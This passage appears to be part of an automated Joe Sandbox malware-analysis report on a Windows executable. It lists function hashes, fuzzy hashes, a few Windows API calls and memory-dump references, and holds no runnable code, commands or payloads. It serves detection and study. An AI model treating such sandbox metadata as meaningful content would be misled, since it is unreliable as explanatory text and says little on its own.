                                                                                          • Opcode ID: 6977f12d58b56f0940369ccbd65f63099f55d0b594b676b76df615edfe4d2474
                                                                                          • Instruction ID: ee93326b31bbb5d83bba39c77c94f7b168c99376b31c97741d56121d1131c9ae
                                                                                          • Opcode Fuzzy Hash: 6977f12d58b56f0940369ccbd65f63099f55d0b594b676b76df615edfe4d2474
                                                                                          • Instruction Fuzzy Hash: B0015E35640349BAEB109FA4DC05FAB77BCFF0A710F005526BA09D7661E3709919CBA6
                                                                                          APIs
                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0089E8CF,?,?,00000008,?,?,0089E56F,00000000), ref: 0089EB01
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionRaise
                                                                                          • String ID:
                                                                                          • API String ID: 3997070919-0
                                                                                          • Opcode ID: ceca701ba6179dc90ca2bbdc18708281048f352c1bcf5c93060e8115ce6c7367
                                                                                          • Instruction ID: bd8bd508f1986c3d09a91241290ddcff658b425d5cb71a6cf263cba0a86dfad9
                                                                                          • Opcode Fuzzy Hash: ceca701ba6179dc90ca2bbdc18708281048f352c1bcf5c93060e8115ce6c7367
                                                                                          • Instruction Fuzzy Hash: 16B11931610608DFDB19DF28C48AB657FE1FF45365F298658E89ACF2A1C335E991CB40
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: gj
                                                                                          • API String ID: 0-4203073231
                                                                                          • Opcode ID: dbfba00243cd5d614b703de5629ca6ed83393c917429bf6d00552786a583f3bb
                                                                                          • Instruction ID: 01e19cbd18f420770c46a4af1eab7a08020bb0b96f2635cb5efd0c9a0dfda133
                                                                                          • Opcode Fuzzy Hash: dbfba00243cd5d614b703de5629ca6ed83393c917429bf6d00552786a583f3bb
                                                                                          • Instruction Fuzzy Hash: 2DF1D1B2A083418FD748CF29D880A1AFBE1BFC9308F19892EF498D7711D634E9458F56
                                                                                          APIs
                                                                                          • GetVersionExW.KERNEL32(?), ref: 0087A905
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Version
                                                                                          • String ID:
                                                                                          • API String ID: 1889659487-0
                                                                                          • Opcode ID: 46acf45148cce9996171aa1e30c39c64a39a01a349a67e6d2d8959757f58455f
                                                                                          • Instruction ID: 2f01d5393c58e36ebcf60eb8833b7a9a8aaa4af074704f1397cc8fe00a81f47b
                                                                                          • Opcode Fuzzy Hash: 46acf45148cce9996171aa1e30c39c64a39a01a349a67e6d2d8959757f58455f
                                                                                          • Instruction Fuzzy Hash: ECF062B49002088BDB2CCF14DC426E977B5F786720F104294DA6993750D3B1DD81CEA2
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001DBCF,0088D604), ref: 0088DBC8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          • Opcode ID: 3a9de65f75986e13ff02e05fb512bcc1ae563caf5eaa476a82a21981c8e5c0f1
                                                                                          • Instruction ID: 63ea88730acb7f30963c6f9eb0d36c1e8906c1561581d5dc16951e6cba59bb0c
                                                                                          • Opcode Fuzzy Hash: 3a9de65f75986e13ff02e05fb512bcc1ae563caf5eaa476a82a21981c8e5c0f1
                                                                                          • Instruction Fuzzy Hash:
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: HeapProcess
                                                                                          • String ID:
                                                                                          • API String ID: 54951025-0
                                                                                          • Opcode ID: 2df5d52c6f5284a35248f54de021de5caff1254c31310861d858bc00037597ed
                                                                                          • Instruction ID: 50cfe7fa832865893bbfda87ec95ba0f3c1bc3fd7879d95d0422f2603d9ac128
                                                                                          • Opcode Fuzzy Hash: 2df5d52c6f5284a35248f54de021de5caff1254c31310861d858bc00037597ed
                                                                                          • Instruction Fuzzy Hash: E5A02230A02200CFB3008F32AF0B30C3AF8BA033C0B00802CA008C3330EB308000AF00
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f76edbdb3f4a612c21f71557bb68a806c2ac5dff8f8e7f0331655fa6002ea0a3
                                                                                          • Instruction ID: 678166ee2d57d339be61fd2da8ac7fb7bd79c3e49585c3d5690b7467472ce676
                                                                                          • Opcode Fuzzy Hash: f76edbdb3f4a612c21f71557bb68a806c2ac5dff8f8e7f0331655fa6002ea0a3
                                                                                          • Instruction Fuzzy Hash: 5162E671604B899FCB29EF38C8906B9BBE1FF55304F04896ED99ACB346D634E945CB10
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 90a98d7e6f2e54dcba7a323e5310e852aff7c38bf50c3d5cf95a57ea582718e0
                                                                                          • Instruction ID: 459efa9019c3fa7b508946108f4c1be71cbfb11f8f4aa0511c59e5f4c5f2678b
                                                                                          • Opcode Fuzzy Hash: 90a98d7e6f2e54dcba7a323e5310e852aff7c38bf50c3d5cf95a57ea582718e0
                                                                                          • Instruction Fuzzy Hash: 1962327060478A9FC719EF28C8805B8BBE0FF55308F14866ED99AC7742E730E965CB85
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c11df8756d099823b9e38222dbb77727418297263203a366b416988efb5d9dfb
                                                                                          • Instruction ID: e2b03af143a143103ce3ee0580584061f9f758055e8b2b5bf7772e8ebdbc15a9
                                                                                          • Opcode Fuzzy Hash: c11df8756d099823b9e38222dbb77727418297263203a366b416988efb5d9dfb
                                                                                          • Instruction Fuzzy Hash: 975249B26087019FC758CF18C891A6AF7E1FFC8304F49892DF5969B255D734E919CB82
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 713e772aeaa5c516db01ea71920bf36a634867898cab53d891e686a11a69bb21
                                                                                          • Instruction ID: 48cc22acee7e4d985ce1cf0fd13f0f63fa22127ba54ab50f7073c383adff0f83
                                                                                          • Opcode Fuzzy Hash: 713e772aeaa5c516db01ea71920bf36a634867898cab53d891e686a11a69bb21
                                                                                          • Instruction Fuzzy Hash: 8012E6B1604B068FC729EF28C9D06B9B3E1FF54308F14892DE597C7A81E774A8A5CB45
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c70d4f24eab11f170dd3377450475ab12c96cfc8edfdbaf08811209af63bfa21
                                                                                          • Instruction ID: a061fdca7f08a9284f6caea7de843c346280b0a15c7ba8be247b5849c7dbf87e
                                                                                          • Opcode Fuzzy Hash: c70d4f24eab11f170dd3377450475ab12c96cfc8edfdbaf08811209af63bfa21
                                                                                          • Instruction Fuzzy Hash: A9F18971A083458FC715CE29C48466ABBE2FFD9714F188A2EF489D7359DB30E9058B42
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                          • Instruction ID: 7f062a5671ac90828f595c01ee1f7d4cc7b0e04944e8482d7cf2ef3756b29f5f
                                                                                          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                          • Instruction Fuzzy Hash: 90C19F362050930ADB6D5639853413EBEA1EEA67B131A077DE5B7CB1D6FF20C524D720
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                          • Instruction ID: 93a96c43110abd3c9363ea7566ff51ab860d73cf6420a10b43de20d073c0aa05
                                                                                          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                          • Instruction Fuzzy Hash: 93C170362091A30ADF6D5639C53403EBEA1EAA67B131A077DD9B6CB1D6FF20C524D720
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                          • Instruction ID: 89e71135f15104b79744c7c75cc630897d8d88e28cf0253569456e69b055defe
                                                                                          • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                          • Instruction Fuzzy Hash: 19C1A0362050930ADF6D967A853403EBEA1AEA27B131A077ED5B7CB1D6FF20C524D720
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                          • Instruction ID: ae8f1e07cde06171c8321af42f33d5d528d22c7b9bf031a9535128a713899e05
                                                                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                          • Instruction Fuzzy Hash: 3FC180362090934ADF6D563AC53403EBFA1AAA67B131A07BDD5B6CB1C6FF20D524D720
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3ed66850edb3e5629a955afca177e3f4961236adcb174bdcb90b3a496b1154a8
                                                                                          • Instruction ID: ff3c742f0a0a60dd1f551fd9cc2fc271632c878a7b6fd75f27336c77f1282486
                                                                                          • Opcode Fuzzy Hash: 3ed66850edb3e5629a955afca177e3f4961236adcb174bdcb90b3a496b1154a8
                                                                                          • Instruction Fuzzy Hash: 7CE1F2B95083948FD344CF69D89086BBBE0BBDA300F49495EF9D597362C234EA15CB62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
                                                                                          • Instruction ID: 279c6d2a21e8a1e1ded6c34e77f54fc99be0d147ff05d26a2971513d2b14d535
                                                                                          • Opcode Fuzzy Hash: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
                                                                                          • Instruction Fuzzy Hash: CA9166B02047498BD728FF68C894BBE73D5FB90304F10092DE69AC7282DAB5DA44C757
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 86dd04280afd63f01108e17e77486281698d63d1f62faca452c1a5f69046b971
                                                                                          • Instruction ID: 800b239678d7be21754562b21d44ba66ba0323fce00c0c1318a7c7c940530951
                                                                                          • Opcode Fuzzy Hash: 86dd04280afd63f01108e17e77486281698d63d1f62faca452c1a5f69046b971
                                                                                          • Instruction Fuzzy Hash: 3E6168B160070CB6DE38BF2C8C95BFE63D8FB12758F1C0A19E842DB691D6119D828356
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
                                                                                          • Instruction ID: c0f8e0f045fa2d86d7b5e4e30976c26e33afe321cda598dca627a600f0b93ed5
                                                                                          • Opcode Fuzzy Hash: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
                                                                                          • Instruction Fuzzy Hash: 9571257030438A5BDB24FE6CD8D4BAD37D1FB91B04F00492DE98ACB286DB74DA858756
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bef3f16cc0c4f77c20004e5b0736d2e18fd6caa9a81c3e33b2f5ddbe5016529f
                                                                                          • Instruction ID: 1ec981e9ee873888c9cb5c808af011f44b36b455d385c61eb8d2d1405a5db74a
                                                                                          • Opcode Fuzzy Hash: bef3f16cc0c4f77c20004e5b0736d2e18fd6caa9a81c3e33b2f5ddbe5016529f
                                                                                          • Instruction Fuzzy Hash: 5B81A09221A2E45DD7068F7D38E42E53FA1BB73300F1C55AAC4C9C66B7C0369568D721
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c0c3b2c285c2a32929f24858096ab199fc9cacfdd71c1866548cd8d68f937e9a
                                                                                          • Instruction ID: 7ae69e1893e04662a8846f7b937d2b5d905b09df795649a6ede333cd3fbee7ee
                                                                                          • Opcode Fuzzy Hash: c0c3b2c285c2a32929f24858096ab199fc9cacfdd71c1866548cd8d68f937e9a
                                                                                          • Instruction Fuzzy Hash: 6D51CC756083954ED712CF29818046EBFF1FFDA324F49889EE4D98B256C230D68ADB52
                                                                                          Memory Dump Source
